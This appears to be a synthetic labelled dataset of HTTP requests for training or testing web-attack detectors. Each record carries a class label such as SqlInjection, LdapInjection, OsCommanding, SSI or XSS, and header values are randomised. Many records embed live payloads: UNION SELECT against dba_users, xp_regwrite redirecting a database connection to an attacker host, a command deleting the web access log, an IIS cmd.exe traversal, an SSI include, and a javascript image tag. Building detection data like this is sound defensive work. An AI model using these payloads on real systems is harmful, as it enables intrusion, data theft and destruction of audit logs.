ETag: "LhwJxsxC5J0WdoKRLD"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sun, 15 Mar 09 15:37:52 CET
If-Unmodified-Since: Fri, 12 Dec 08 04:35:07 GMT
If-Match: "7.FLD_rMMQLXTAnYw"
If-None-Match: "H2cElbSFbJ7Na3J-.-"
If-Range: Sun, 24 Apr 05 15:18:28 UTC
Max-Forwards: 2
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: arbdmm d5imtsen=htu1tR
Range: -47510,582-0
Referer: /crz4traa/naehr.png
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/7.6 (Windows; U; Windows NT 6.4; qr-m3; rv:3.1.2) Gecko/97101095
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: HTTP/5.1 www.exeEe.html
Transfer-Encoding: compress
Warning: 028 www.eo6itwta.css "IsnphdAiybeogei" "Tue, 31 Aug 04 23:00:46 GMT"
X-Forwarded-For: 135.18.204.64
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36731
Start - Id: 37640
class: LdapInjection
POST /dXYLdLg4QSYkfqrvdkgX.mspx? HTTP/1.0
Content-Length: 242
Content-Language: rRoDyE,ha,sn6de2y
Content-Encoding: identity
Content-Location: /ta6o/id5ecwis/1a95h/ensnjos.php3
Content-MD5: d3N1bnRld251c2djMGVhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 13:53:15 GMT
Last-Modified: Fri, 05 Nov 04 01:09:13 GMT
Host: www.ueiqde.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: arnkg-Oah;q=0.8
Cache-Control: min-fresh=8072
Client-ip: 76.236.29.239
Cookie: J0noyNOP=intcataisock_streamefHd;tajiae0e=a336ehuw0i;hQLBShSWjfromV=ec8
Cookie2: $Version="42"
Date: Sat, 02 Feb 08 16:26:42 GMT
ETag: "oj5Qe7MEf.fDr8DX"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 30 Jan 07 21:34:52 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "@l6I15syWjZBLMLi"
If-None-Match: "POOgnptlEENvRjltB"
If-Range: Sat, 21 Feb 09 12:41:48 CET
Max-Forwards: 85
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: /bg2pae/tfeeta/nlsTiah/i1vms06t/oAta.asp
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: ilBOXE http://www.doA0nav.gov
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: gda/5.8 249.207.108.174, 2.6 152.126.196.113, rwscO/4.8 169.132.87.134
Transfer-Encoding: deflate
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 128.30.229.67
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

enao=871682&iecIb0bmioodxru=182&dhetror=eiUxtULqpDjJ&fnri=)  ( |  (displayName=had*)  (name =    had*    )( mail=had*)&c9mm=1l&R1H2hincludevjG=451623&eaortmhtnmeosso=tsw3bomJe2rehlIcdi&w8nuo0Y=eMwDoJTbz&dkng6Tbey7=1439

End - Id: 37640
Start - Id: 49312
class: XPathInjection
GET /xejda/60J_S-HXr_EcHG./o5kjGm1group bytD/W@hQ7mailWautoexec6P/evd8BWJ4je7@/KwAYlw56v./R8vbscript_select.vOZ1cdn.dll?lml=d2l%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+%27s3iRer%27%3D%27 HTTP/1.1
Host: 248.176.33.156
Connection: yetbhwa
Accept: */*;q=0.3
Accept-Charset: windows-1257;q=0.5, windows-1254;q=0.2, euc-kr
Accept-Encoding: *
Accept-Language: anuf93a-oots;q=0.8, eteoa-nf;q=0.4, kppsgln-ded;q=0.0, fdhrse-h;q=0.0, paoae6s-hdiEet;q=0.8
Cache-Control: no-store
Client-ip: 19.197.54.208
Cookie: aEoO=cc7ttS8eftpand;iaees4Em=437810049;vhn=nsUwtKoWU;ewmh9=n/1Sbyn+]tko\;eogrce=T4sarent;eps=ed_v
Cookie2: $Version="01"
Date: Tue, 04 Jul 06 05:16:04 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Fri, 03 Sep 04 17:15:53 UTC
If-Match: "BWbgw41M@d1TKoR"
If-None-Match: *
If-Range: Fri, 18 Nov 05 04:26:47 CET
Max-Forwards: 504
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZDd2bXlmOnRydmVsZWg=
Range: 28823-,87212-
Referer: /en2fl.zip
TE: gzip;q=0.4,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.0 (compatible; eh7calc; Open BSD i386; 98jsyeG; seoiah)
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: dni/4.9 184.216.170.59, FTP/3.4 www.eath.jpg
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 623 193.252.199.121 "khrNsixEqbqewainsMhL" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49312
Start - Id: 42000
class: SqlInjection
GET /eEnfuceElnr/RKk/iyD._.mdb?phB6Ao=topn3et72e&ji0Twindow.openz=97306&DAWdk.m=s4Fg&irat0lrietmfi=%27++or++id++in+%28++++select+++++*++++from+++user_db++%29&mhw=%3Aghavingq&xeO9S0fetlr=2&3rrinGeati=+6yob%27rwsc%3Brndytmctmpu&e0theg2e=nntiitnieuyt5em&ebNk=a&iyeknh=56839839&etaySrsasl4=8782&4t9he=uwunionzf HTTP/1.1
Host: www.odfeelh.st
Connection: close
Accept: image/png;q=0.8, image/gif
Accept-Charset: *
Accept-Encoding: deflate, compress, identity
Accept-Language: s75trh-sdrlo, hfdas6u-itrtarat;q=0.2
Cache-Control: no-cache
Client-ip: 134.245.214.117
Cookie: ginputwherelN=d;crien5o=9728037;n3irqswo1tcwei=tbmuy5
Cookie2: $Version="554"
Date: Tue, 10 Feb 04 18:26:15 GMT
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: ns3gzos
From: wXro@erouh.com
If-Modified-Since: Sat, 24 Apr 04 18:57:35 CET
If-Unmodified-Since: Mon, 07 Jan 08 01:48:18 CET
If-Match: *
If-None-Match: "TWkahLQWMbHAc9mcpRd"
If-Range: *
Max-Forwards: 06
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest qop=auth
Range: -728027,84041-8,736156-
Referer: /jesPI.sh
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/3.6 (Windows; U; Win98 3.9; 7n-qd; rv:7.4.7) Gecko/72336909
UA-CPU: StrongARM
UA-Disp: 3403,6201,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 3.7 231.241.184.146:8957, 8.3 221.60.38.0
Transfer-Encoding: compress
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42000
Start - Id: 41451
class: SqlInjection
POST /4GF9tIkw_JUvie/shgcnaaybhDaea/t6/fcpgqEuXRDiXzZ_a.png? HTTP/1.1
Content-Length: 218
Content-Language: ehdo
Content-Encoding: deflate
Content-Location: /hqvf.ace
Content-MD5: M2VubmFtaTFPc2VlQWhvaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 04 10:14:03 GMT
Last-Modified: Fri, 20 Aug 04 05:19:24 UTC
Host: www.3aobkaRr.biz
Connection: oiuSloo
Accept: audio/x-wav;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 87.117.104.122
Cookie: toe5wXeihntl=nendnrI0dowhere;91moeetjes=tleogso1m;fe7eenfdepjD=4oeMesefMrn7tl8;llI7edrhxtetdb=m;cmd36WXmzDc=lsrexecirifp9ennlp;edwrktiu=nsO4k
Cookie2: $Version="9"
Date: Tue, 11 Oct 05 10:30:27 CET
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: ysrandij=meot
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 20 Dec 08 24:10:57 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: *
If-None-Match: "QfP-JhQ.v17vLKhsSh_"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 99
MIME-Version: 2.7
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest qop=auth
Range: 863-,45-,1-
Referer: /lp1i7aei/5inh1k/aslsnss/eiaiqa/ardt.js
TE: deflate;q=0.2
Trailer: Expect
User-Agent: 5th4fzithhezimeiai
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 307 www.aiPaisn.jpeg:7090 "ttaoiIpDdouernxa" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

m4vuederoeHiH=051&vnyhbhJesaz=5408&lboc5it3fv=;E=ischildi&tvart:mor&WjLaaBs=352759&nUoZasP=a&msnGefo1='    OR 'erdat8ro' =   N'   &FphpCEh_b=eje1tvftu5Snnhoou&teivdtd=aLecisisn&od=betweenA)z&irrO=30

End - Id: 41451
Start - Id: 43590
class: OsCommanding
GET /rYE6P/9Ym.5E4lfBTMEy/ac/cea4hfoN0cOomk/yei/diLJe/O6-AE/aunAvj_g-RZBf6FHAC/talzcO0agh4eeass.shtml?lfrni1e6nasniN=tqf_&lorleee6e8io2=%250arm+++++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++++%3B&3nodehc1adminc4cHr=rBg.tiNq. HTTP/1.0
Host: www.ethses1.org
Connection: close
Accept: application/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: ruostbsi-j;q=0.3, kserme-etmr, ay4-m
Cache-Control: u='mqwx'
Client-ip: 170.185.16.223
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="8"
Date: Sun, 22 Jul 07 01:30:01 GMT
ETag: "Wr_8UDQVijKJUROKG"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 16 Nov 09 14:31:55 UTC
If-Unmodified-Since: Sun, 13 Jul 08 06:14:53 CET
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Tue, 30 Jan 07 23:03:21 CET
Max-Forwards: 998
MIME-Version: 6.7
Pragma: o='arb'
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 0756-,6170-,99043-471
Referer: http://Efdc8.gov/n9iesE/owdints/tzit6r3/7eo0niir/esant.tiff
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 0.3; fd-rs; rv:3.2.3) Gecko/12894864
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43590
Start - Id: 37220
class: LdapInjection
GET /g-UtgX/7kgj%u9group byUafnode.asp?iioprn4irnem9h=%3B%3F-&uebeo8nn=ir%7EzuIhaho&lai1afh44ehoe=odhel%29%28%7C+++%28idear%3D*%29&6hNd=7 HTTP/1.0
Host: 177.218.68.192
Connection: rcIsnql
Accept: application/rtf;q=0.7, text/xml;q=0.8
Accept-Charset: gb2312, shift_jis;q=0.3, iso-8859-8, windows-874
Accept-Encoding: identity, compress
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 231.33.198.222
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="23"
Date: Thu, 23 Apr 09 17:01:32 CET
ETag: W/"rZy5O4khBGnzJI7m1"
Expect: eesgne
From: hsosdtF@auonsc62n.be
If-Modified-Since: Wed, 05 May 04 23:27:54 GMT
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 0365
MIME-Version: 2.4
Pragma: eeli=8a
Proxy-Authorization: NTLM b2Zlc3JlaWRlc3BpcHl0cnRvc2VzbXFoeWVuc2FpYWJ4RUJyVm50dGFlcnJ5OA==
Authorization: Digest opaque="OnuSrle"
Range: 783-
Referer: http://iouoni.net/66A6/ot0hedmh.aspx
TE: gzip,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: zmog (rotYk4QY; tGcgBnp)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 2.6 www.etaffMy.shtml:479
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37220
Start - Id: 44507
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 82.199.78.126:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: bUxu-rxosrw;q=0.7
Cache-Control: only-if-cached
Client-ip: 245.96.181.37
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="123"
Date: Wed, 31 Mar 10 07:12:50 UTC
ETag: W/"BM7GJYNnC3qxjsK"
Expect: auaEbj2f=ti3z24oz
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Mon, 24 Sep 07 11:20:46 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5157
MIME-Version: 8.2
Pragma: 6S79ho=egaepie
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://h3bls.it/Ddow/tfoBeItP/8y5t4/haei.swf
TE: gzip;q=0.6
Trailer: Via
User-Agent: zzCJpDTAtu http://www.e5lo.ch
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44507
Start - Id: 41000
class: SqlInjection
POST /op9nb/smr73oei9eism/LuJiP1yKyfRDcMK/ghnn/tfNy@Kj5@gf/iinscntw/wp-_Kxwu.gif? HTTP/1.1
Content-Length: 211
Content-Language: 7e
Content-Encoding: deflate
Content-Location: http://top6jr2u.org/hCea1.jsp
Content-MD5: dGVvaXVoc21sc3Nzb253aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Aug 06 01:54:52 UTC
Last-Modified: Wed, 21 Sep 05 12:11:13 CET
Host: www.1tdejsd.org
Connection: keep-alive
Accept: text/*;q=0.8, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.11.222.202
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="889"
Date: Tue, 03 Aug 04 22:23:11 UTC
ETag: "vXvN5UnvPs4m@hSmv5"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Fri, 06 Oct 06 09:10:21 CET
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 66
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: http://ahity8bl.com/e6ed/pon6her/COhi/sioI3t.dll
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.9 (compatible; Konqueror/5.3; WinNT; p4tbAa; B1emUVrn)
UA-Pixels: 892x2342
Via: HTTP/1.6 www.n6i3esI.html:06
Transfer-Encoding: gzip
Warning: 092 www.iatd.shtml:71805 "ctDcdozaQeosubhna" "Tue, 21 Sep 04 21:29:02 UTC"
X-Forwarded-For: 181.40.75.124
----: ------------

Wee9rnsrhqlfl1=exec xp_regwrite   'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','igawttbApr','REG_SZ','DBMSSOCN,hackersip,80'&JEFp=bmAfLBB4Xr&eo=5

End - Id: 41000
Start - Id: 40418
class: SSI
POST /wyq/ty73nha/KorI/eeeiuvpeeqa4iiyshmy/eaA8xBPvcaQpTx8/cS7h/tcd1/iltistotpmelOMu1sb/wAshiuceDnn/vuhtcul6Oirnte8d/paACsDW.aspx? HTTP/1.1
Content-Length: 240
Content-Language: t
Content-Encoding: identity
Content-Location: http://www.suaJzsf.biz/iisinu.php3
Content-MD5: aGxidExkaGFtdGVlbGlOYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Jun 09 06:05:52 GMT
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: www.g0noawo1.biz
Connection: close
Accept: application/*;q=0.8, image/png
Accept-Charset: euc-cn;q=0.0, x-mac-greek;q=0.2, iso-8859-5, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: erhN-s;q=0.4, s-8pi;q=0.1, 8aoh6-ero21, otbi-ouO7;q=0.2, ymm-t
Cache-Control: max-stale
Client-ip: 21.72.112.249
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="57"
Date: Fri, 08 Sep 06 17:47:26 CET
ETag: W/".m@VDwteYf4x4358G1Y"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Mon, 20 Mar 06 22:33:06 CET
If-Unmodified-Since: Fri, 28 Dec 07 09:28:04 CET
If-Match: "_IXbohTjh6.QtTcuf61"
If-None-Match: "sr26yeNLHGQhSyN@1OSz"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 0
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: -687,0114-940064
Referer: /orme/nrete/hhnSea/piesas.dll
TE: trailers
Trailer: Accept-Encoding
User-Agent: uqrUsr (t3X8ar.; eS3fxKz; h0b-Xg6cb)
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 808x844
Via: tuettz/8.2 67.10.94.250, FTP/6.3 253.199.51.148, HTTP/1.9 8.144.215.199
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 538 222.86.10.146 "Etlso9Shinasieza" "Sun, 13 Jul 08 18:44:23 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

itrd2sw=) wne&ftcne=0ascde&l8e=rsan&see=uap5s&3owzkb=eropeni-sbCs&xp_execN5-null=1057&daaoeenn=pYd&nqvgBfae0ut=s8~tmX&R4CrF7K=hRea&n8lt9t9pTh=el7asdetcy&e3qisfe=<!-- #include    virtual="d:\windows\autoexec.bat"  -->

End - Id: 40418
Start - Id: 47319
class: XSS
GET /tafeeoE7foietowwx/qOsystem/n6nep9rgt1hs.htm?zh=i9kEsrrrtiewwtnyj&ne=a9jZzoQdHW&TaE29QxVdP2=nN8TIYGHVT&SM.formautoexecdeleteuGC=6212041&iEth41ljyrlaah=egisntmc2&osutoebift=eai%3F&rnsnsAsom=rhLFJ_r1cB&TOC_Onph-W-=aaef%3ApkeI&o6=Xte%40nte9eformDa0i+%3Ds%3B%26&a5dnoaNm=%3Cimg+src++++%3D+++%22javascript%3A++%5Balert+++%28%27mkesiP%27%29%3B%5D+++%22+++%3E&0e9lsoN6twisane=replace HTTP/1.1
Host: 246.223.192.137
Connection: keep-alive
Accept: image/jpeg, video/*;q=0.8, text/*;q=0.4
Accept-Charset: iso-8859-1, x-mac-chinesetrad;q=0.8, iso-8859-7, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 188.124.236.19
Cookie: etroTrrE6=dt;ptibnoeotrsaeal=2147;tnsgFwcnieenc=fents
Cookie2: $Version="508"
Date: Wed, 21 Jan 09 24:00:22 CET
ETag: W/"@-3igXFzz.XbYHw@rM"
Expect: 100-continue
From: fvc2@eesg.net
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Sun, 06 Aug 06 13:47:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest uri=http://www.kiaenw3.st/ehjeCct/ffEvEde/rm4i/ymaoit/rasiham.cgi
Range: -827060,69-,229-399617
Referer: http://www.1aees.com/ieqr7/28tbEgim/msoo/m4wt/sr6t.mpg
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: awts8t42heNssrts
UA-CPU: Sparc
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5306x1733
Via: 9.1 www.6zts.jpg, kl6eeo/5.0 www.igaensu.jpg, ttlasm/7.8 129.171.210.3
Transfer-Encoding: identity
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47319
Start - Id: 41585
class: SqlInjection
GET /SSUGKzVEt/6x./i5sR_DAiMhLbD-V/s0R2nEW8Eg/hUbsree/-7@0/7QbnFt4qyDDRyl0ULWn/Tdrh5ki9nrondRj/spcft4f.msf?heAK8xtVtbetween=hdmbO&ufimgIX=%25xmltbetween&mtAfwhsth0gI8r=67kkhme8IKiCtuod&oRu6cN2a3somnd=snosdRsErnbaRb&eyf=FxhttdYeshsmerk&lwee=metvmmirew13e&tsorm=chairs%27++UN%2F**%2FION++++SEL%2F**%2FECT+++++hOMgniear++++FROM+dba_users+++WHERE+bboa+like+%27%2525&einIaecnemes2=0q6ist2eedwg&L6bhavingP=oe&cHfaelwdu=2cfsnh&ihtssaoxt=h%26&eeifp7lhd=hDs55 HTTP/1.1
Host: 103.23.23.10:80996
Connection: 7hoi
Accept: text/xml;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 38.173.11.46
Cookie: noffnh5oAj0kscW=:suAf1euaccept3 zJkb;beQJGiframej=309764
Cookie2: $Version="8"
Date: Wed, 29 Aug 07 22:05:01 UTC
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Sun, 11 Apr 04 21:54:00 GMT
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: *
If-Range: *
Max-Forwards: 1770
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: Basic MWdkZjpob2lydA==
Range: 572-0
Referer: /eeRaktl/uet31es/lee5mofi.mspx
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 8.0; Ts-yD; rv:9.8.2) Gecko/66931549
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1236x139
Via: FTP/7.3 www.jhhh4c7s.gif, FTP/6.4 180.37.43.147
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41585
Start - Id: 37671
class: LdapInjection
PUT /svAt4E.jpeg? HTTP/1.0
Content-Length: 136
Content-Language: e,ctte
Content-Encoding: identity
Content-Location: http://oyattka.biz/al4io1/n0y4s20.ace
Content-MD5: YXRuZWV2Y2RjckFhdmkweQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Mar 07 04:17:17 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: www.7reeta1.biz
Connection: te9oAuea
Accept: text/html, audio/*
Accept-Charset: big5;q=0.8, iso-8859-3;q=0.6
Accept-Encoding: 
Accept-Language: a-eti, OWtcpN-aogvosps;q=0.6, Ni-osmt
Cache-Control: ridr=1cmty
Client-ip: 234.96.170.169
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="613"
Date: Sat, 02 Dec 06 03:46:15 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Sat, 12 Jun 04 07:59:41 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: Mon, 08 Nov 04 04:50:13 UTC
Max-Forwards: 1
MIME-Version: 9.4
Pragma: lNRta='ets8I39a'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 7-75,773-,28-851
Referer: /tedLhh/iesb6/oris/ttsn.jsp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 3.3; dl-t3; rv:9.2.6) Gecko/95340301
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: deflate
Upgrade: pemoEi/4.0
Warning: 123 225.46.208.152:9661 "sweilsrzmalesAdlaO" 
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntken=aP-ZK8VZvl&ae0an=n%u&blaaqdhf3=61762&ehtcuEEtAid=)    (|   (   cn=*o    'brien*  )(mail    =*o   'brien*) 

End - Id: 37671
Start - Id: 36933
class: LdapInjection
POST /qynj/edZaJ/e2gK4hgteis/t7iDgdhaTks2kona/Ssi/omNssY/mqI4qEureibipShtld/Mtaera3ee6egn/aETKsKQVLps6Jhm_jGB3/XDMGeoZG.i-vEQ8.cgi? HTTP/1.0
Content-Length: 116
